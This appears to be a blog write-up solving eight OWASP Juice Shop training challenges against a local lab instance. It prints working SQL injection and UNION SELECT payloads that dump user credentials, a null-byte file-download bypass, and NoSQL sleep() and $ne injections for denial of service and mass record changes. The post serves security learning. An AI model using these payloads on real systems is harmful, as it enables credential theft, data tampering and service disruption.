WebSec 101: JuiceShop ⭐⭐⭐⭐ challenges 2/3

Hello!

Welcome to the second part of my web sec journey through Juice Shop four stars challenges!

Just to remind you, there are 24 ⭐⭐⭐⭐ challenges and I previously coped with 8 of them and today I’m planning to solve another 8 from categories: Injection, Sensitive Data Exposure and Security through Obscurity and Cryptographic Issues 😊 (that’s why I’m also tagging here as #cryptoRelated!)

Let’s get down to hackin!

Goals

In the previous part, WebSec 101: JuiceShop ⭐⭐⭐⭐ challenges 1/3, I’ve managed to solve 8 challenges marked as: Injection, Sensitive data Exposure, Broken Access Control and Improper Input Validation. There are 16 challenges left:

• Sensitive Data Exposure – 3
• XSS – 3
• Injection – 3
• Vulnerable Components – 2
• Broken Authentication – 2
• Cryptographic Issues – 1
• Security through Obscurity – 1
• Unvalidated Redirects – 1

Today I’m willing to complete 8 of them In 4 categories:

• Sensitive Data Exposure – 3
• Injection – 3
• Security through Obscurity – 1
• Cryptographic Issues – 1

And my score board looks like:

Let’s go!

⭐⭐⭐⭐Leaked Unsafe Product (Sensitive Data Exposure)

In this first challenge we have to identify an unsafe product that was removed from the shop and inform the shop (via the contact form) which ingredients are dangerous. As a hint we know that our own SQLi and someone else’s Ctrl+V will be our accomplices in this challenge.

In the previous article, WebSec 101: JuiceShop ⭐⭐⭐⭐ challenges 1/3 in Christmas Special challenge we have discovered that some products are missing. Let’s try to enumerate all of them, but this time with SQLi.  As we know from previous articles, for example WebSec 101: JuiceShop ⭐ challenges, search query may be vulnerable. Let’s use it to list all of the products.

Intuitive GET /rest/products/search?q='-- request results with:

"message": "SQLITE_ERROR: incomplete input",
"sql": "SELECT * FROM Products WHERE 
((name LIKE '%'--%' OR description LIKE '%'--%') 
AND deletedAt IS NULL) ORDER BY name"

As we can see, WHERE clause looks (after our little cut) like:

SELECT * FROM Products WHERE ((name LIKE '%'--

And we need to close the bracket with )) (double bracket ending)

So with the request GET /rest/products/search?q='))-- we receive list of all products, and we can inspect those previously missing (potentially unsafe) :

The unsafe product is Rippertuer Special Juice. Sending Cherymoya Annona cherimola, Jabuticaba Myrciaria cauliflora, Bael Aegle marmelos… and others string is not solving the challenge, so I’ll google it.

It leads me to Top 20 Fruits You Probably Don’t Know – Listverse page

A simple comment there leads us to pastebin (somone else’s Ctrl+V)

So we have to visit Rippertuer Special Juice Ingredients pastebin, which looks like JSON:

(...)
"type": "Hueteroneel",
"description": "The manchineel is a round fruit about the size of a tangerine native to 
Mexico and the Caribbean. It’s also known as the “beach apple” and can be quite tasty. It has reddish-greyish bark, small greenish-yellow flowers, and shiny green leaves. 
The tree has been used as a source of timber by Caribbean carpenters for centuries. 
It must be cut and left to dry in the sun to remove the sap. 
Only a warning, this coupled with Eurogium Edule was sometimes found fatal, 
though the reports are scarce. 
A gum can be produced from the bark which reportedly treats edema,
 while the dried fruits have been used as a diuretic."
(....)

So Hueteroneel within Eurogium Edule are our unsafe ingredients!

After sending a comment containing both names challenge is solved 😊

⭐⭐⭐⭐Misplaced Signature File (Sensitive Data Exposure)

Now we have to deal with misplaced SIEM signature file. To do that we need to ‘trick a security mechanism into thinking that the file you want to download has a valid type’.

Also, SIEM signature points to Neo23x0/sigma Github where we can read about SIGMA – Generic Signature Format for SIEM Systems

Sigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner. The rule format is very flexible, easy to write and applicable to any type of log file. The main purpose of this project is to provide a structured form in which researchers or analysts can describe their once developed detection methods and make them shareable with others.

Sigma is for log files what Snort is for network traffic and YARA is for files.

What is Sigma – Neo23x0/sigma Github

Again, we have to get back to ftp directory

And download suspicious_errors.yml using Null Byte Poisioning described in WebSec 101: JuiceShop ⭐⭐⭐⭐ challenges 1/3 which basically is:

http://127.0.0.1:3000/ftp/suspicious_errors.yml%2500.md

⭐⭐⭐⭐Nested Easter Egg (Cryptographic Issues)

This is one is first (real one) challenge that has anything to do with real Crypto! Crypto, as you know, is what tigers like best, so let’s get down to it!

We have to apply some advanced cryptanalysis to find the real easter egg and peel through several layers of tough-as-nails encryption for this challenge.  As we know from previous part, hidden easter egg is hidden in ftp dir. Here is its content:

"Congratulations, you found the easter egg!"
- The incredibly funny developers

...

...

...

Oh' wait, this isn't an easter egg at all! 
It's just a boring text file! 
The real easter egg can be found here:

L2d1ci9xcmlmL25lci9mYi9zaGFhbC
9ndXJsL3V2cS9uYS9ybmZncmUvcnR0
L2p2Z3V2YS9ndXIvcm5mZ3JlL3J0dA==

Good luck, egg hunter!

We have to investigate L2d1ci9xcmlmL25lci9mYi9zaGFhbC9ndXJsL3V2cS9uYS9ybmZncmUvcnR0L2p2Z3V2YS9ndXIvcm5mZ3JlL3J0dA== string.

Looks like Base64 encoded! After decoding we receive: /gur/qrif/ner/fb/shaal/gurl/uvq/na/rnfgre/rtt/jvguva/gur/rnfgre/rtt – something that looks like an url.

Ok than. After checking this as url, its not working. So it must be some sort of shift cipher!

I’ve decided to write easy-peasy article about shift ciphers and decrypting this egg (step-by-step). This article you can find here:

CryptoPy: Caesar Cipher aka Shift Cipher in Python – I strongly encourage you to give it a try 😉

…

After we found out its ROT-13 cipher, we can easly decode it to: /the/devs/are/so/funny/they/hid/an/easter/egg/within/the/easter/egg

Visiting http://127.0.0.1:3000/the/devs/are/so/funny/they/hid/an/easter/egg/within/the/easter/egg solves the challenge!

⭐⭐⭐⭐NoSQL DoS (Injection)

Now we have to let the server sleep for some time! Great idea, everybody needs some rest from time to time 😉

Also, we know that this challenge is essentially a stripped-down Denial of Service (DoS) attack. So what is DoS attack?

A denial-of-service (DoS) attack occurs when legitimate users are unable to access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor. Services affected may include email, websites, online accounts (e.g., banking), or other services that rely on the affected computer or network. A denial-of-service condition is accomplished by flooding the targeted host or network with traffic until the target cannot respond or simply crashes, preventing access for legitimate users. DoS attacks can cost an organization both time and money while their resources and services are inaccessible.

Understanding Denial-of-Service Attacks – US National Cyber Awareness System

We also have a hint, that it should be NoSQL attack.

NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren’t using the traditional SQL syntax. Because these NoSQL injection attacks may execute within a procedural language, rather than in the declarative SQL language, the potential impacts are greater than traditional SQL injection.

NoSQL database calls are written in the application’s programming language, a custom API call, or formatted according to a common convention (such as XML, JSON, LINQ, etc). Malicious input targeting those specifications may not trigger the primarily application sanitization checks. For example, filtering out common HTML special characters such as < > & ; will not prevent attacks against a JSON API, where special characters include / { } : .

Testing for NoSQL injection – OWASP Testing Guide

So basically we will try to invoke sleep(milliseconds) MongoDB method.

As we already discovered, there is some rest some api, which takes {paremeter} we can try to inject. One of it is e.g. GET /rest/products/1/reviews mentioned in WebSec 101: JuiceShop ⭐⭐⭐ challenges 2/2 where 1 is be our {parameter} .

After sending GET /rest/products/sleep(1000)/reviews request we have to wait … before receiving response ’cause server is napping 😴

⭐⭐⭐⭐NoSQL Manipulation (Injection)

NoSQL again, and we have to update multiple product reviews at the same time. We are advised to look closer on UPDATE Mongo equivalent.

Let’s try to investigate reviews mechanism. Writing a review is a PUT request PUT /rest/products/1/reviews with body:

{"message":"nice one","author":"jim@juice-sh.op"}

Still, bear in mind that we injected {parameter} in {id} in  /rest/products/{id}/reviews request.

Changing a review, on the other hand, is PATCH request: PATCH /rest/products/reviews with body:

{"id":"yJHB2wg97AmmTbYpn","message":"nice two"}

So changing the review contains id in the body!

NoSQL Injection is different than classic SQL Injection, so I decided to broader my knowledge, reading A NoSQL Injection Primer (with Mongo) – Null Sweep article.

There is trick described, when author is bypassing logging page with simple $ne (not-equals) verb like:

{"username":"myaccount","password":{"$ne": 1}}

With big credit to Charlie Belmer, I’ll try the same trick here!

PATCH /rest/products/reviews HTTP/1.1 request with body:

{"id": { "$ne": -1 },"message":"nice two"}

Solves the challenge 😉

⭐⭐⭐⭐Reset Uvogin’s Password (Sensitive Data Exposure)

This one is tricky, because we have to reset Uvogin’s password via the Forgot Password mechanism with the original answer to his security question.

We know from administration page that his mail is (what a surprise):
uvogin@juice-sh.op

With Forgot Password form we can check, that his security question is about favorite movie:

We are advised to do some OSINT on social media.

Long story short, turn’s out that Uvogin is having uv0gin twitter account 😊 with only one post, related to Juice Shop!

I th0ugh7 I f1n4lly f0und a r3l1abl3 0nl1n3 st0r3 f0r b3v3rages.
Turn5 0ut 1t's m0r3 l1k3 a ch3ckl1st of 
wh4t NOT t0 d0 wh3n bu1ld1n6 a s3cure app. 0 stars

Checking his twitter account with WayBack Machine shows us three snapshots, one of them (here) contains very interesting (and deleted) tweet:

So answering Silence of the Lambs as favourite movie, solves the challenge!

⭐⭐⭐⭐Steganography (Security through Obscurity)

Steganography! Sounds mysterious… so do we know about this art?

Steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video. The word steganography combines the Greek words steganos (στεγανός), meaning “covered, concealed, or protected”, and graphein (γράφειν) meaning “writing”.

Steganography – Wikipedia

Now we have to rat out a notorious character hiding in plain sight in the shop. (Mention the exact name of the character) and no matter what, we will need some external tool.

To be honest, I didn’t know where to start, so I’ve checked more extensive hints…

They only pointed that ‘This challenge cannot be solved by just reading our “Lorem Ipsum”-texts carefully.’

Let’s try to find something odd in images on this lorem ipsum page – which is About us. 

In carousel below, there are five pictures:

The only difference is that img 5 has .PNG extension instead of .JPG.

But it looks perfectly normal with no metadata:

But that’s the art of steganography…

One of the most interesting stego applications is OpenStego – free steganography solution.

OpenStego provides two main functionalities:

Data Hiding: It can hide any data within a cover file (e.g. images).

Watermarking (beta): Watermarking files (e.g. images) with an invisible signature. It can be used to detect unauthorized file copying.

Introduction – Open Stego

OpenStego is able to extract some data from the file!

And we can find that Picle Rick from Rick and Morty solves the challenge!

⭐⭐⭐⭐User Credentials (Injection)

The last Injection is the icing on the cake!

We have to retrieve a list of all user credentials via SQL Injection. We are advised to gather information where user data is store and how it is addressed and then craft corresponding UNION SELECT – can’t wait!

As we’ve learned before, search query (GET /rest/products/search?q=)is vulnerable to SQL injection. We know that '))-- attack is working.

Let’s split it into simple steps:

1. I’ll try with '))UNION SELECT * FROM X-- as parameter… and boom 💣! "SQLITE_ERROR: no such table: X",
2. Let’s try with best guess: FROM Users…
3. "SQLITE_ERROR: SELECTs to the left and right of UNION do not have the same number of result columns"
4. WE ARE HOME!
5. '))UNION SELECT '1' from Users-- results with the same error,
6. '))UNION SELECT ‘1',’2’ from Users-- — same error,
7. After a while…
8. '))UNION SELECT '1','2','3','4','5','6','7','8','9' from Users-- — SUCCESS!

And the response with an extra element:

{
      "id": "1",
      "name": "2",
      "description": "3",
      "price": "4",
      "deluxePrice": "5",
      "image": "6",
      "createdAt": "7",
      "updatedAt": "8",
      "deletedAt": "9"
    }

Let’s be honest – we know this API very well and we could’ve count the number of columns… We also know columns names we are looking for – id, email and password

Now let’s craft proper union select – I’ll add qwerty on the beginning to cut off the products, and replace column names:

qwerty')) UNION SELECT id, email, password, 
'4', '5', '6', '7', '8', '9' FROM Users—

Gives us valid response:

And solves the challenge!

Conclusion

Scoreboard for another part of this competition: done & green!

I’m two-third of four-star challenges and 61% of solving whole score board!

This 8 challenges was really fun – a lot of Injection (3 of them!) both for SQLi and NoSQL, and also #crypto suff, as well as stego 😀 Nice!

I really enjoy this journey and I really appreciate that it pushes me to write a simple script to decode ROT-13 cipher (and small article about it in the nearest future 😉) – it makes me grow faster!

CryptoPy: Caesar Cipher aka Shift Cipher in Python – check this out!

That’s it for today!  I’m going for a nap (like the serverd did) and I hope you enjoyed this article!

If you have any questions do not hesitate to contact me!

Regards!

Reference list:

1. Top 20 Fruits You Probably Don’t Know – Listverse page
2. Rippertuer Special Juice Ingredients pastebin
3. Neo23x0/sigma Github
4. Understanding Denial-of-Service Attacks – US National Cyber Awareness System
5. Testing for NoSQL injection – OWASP Testing Guide
6. A NoSQL Injection Primer (with Mongo) – Null Sweep
7. Steganography – Wikipedia
8. Introduction – Open Stego

Check out related posts: